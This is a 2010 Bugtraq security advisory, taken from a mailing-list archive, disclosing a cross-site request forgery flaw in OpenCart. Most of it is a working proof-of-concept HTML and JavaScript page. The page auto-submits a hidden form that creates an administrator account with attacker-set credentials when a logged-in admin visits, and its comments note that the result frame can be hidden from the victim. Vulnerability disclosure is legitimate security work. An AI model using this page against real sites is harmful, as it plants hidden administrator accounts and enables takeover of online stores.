lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 2 Feb 2010 15:13:25 -0000
From: ben@...ionsource.org
To: bugtraq@...urityfocus.com
Subject: OpenCart CSRF Vulnerability

Advisory Information:

Title: OpenCart CSRF Vulnerability
Advisory URL:
http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/
Date published: 2010-01-28
Vendors contacted: OpenCart
Security Risk: High

Vulnerability Description:

OpenCart is vulnerable to CSRF attacks using the POST method. It is possible to craft a malicious page that will create an administrator user when the victim, who is logged into OpenCart, visits the malicious page.

Proofs of Concept:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <title>OpenCart CSRF Vulnerability</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<script type="text/javascript">
		function csrfInjection()
		{
			var params = {
							'username'		: 'an_attacker',
							'firstname'		: 'attack',
							'lastname'		: 'user',
							'email'			: 'some.user@...domatackerdomain.com',
							'user_group_id'	: '1', //Default group id for administrator level is 1
							'password'		: 'test',
							'confirm'		: 'test',
							'status'		: '1'
						 };
			
			var form = document.createElement("form");
			form.setAttribute("method", "post");
			form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

			for(var key in params) {
				var hiddenField = document.createElement("input");
				hiddenField.setAttribute("type", "hidden");
				hiddenField.setAttribute("name", key);
				hiddenField.setAttribute("value", params[key]);

				form.appendChild(hiddenField);
			}

			attack_result.document.body.appendChild(form);
			form.submit();
		}
	</script>
  </head>
  <body>
    OpenCart CSRF Vulnerability

	<input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />
	<a href="#" onclick="csrfInjection();return false;">Add User</a>

	<p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>
	<iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>
  </body>
</html>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ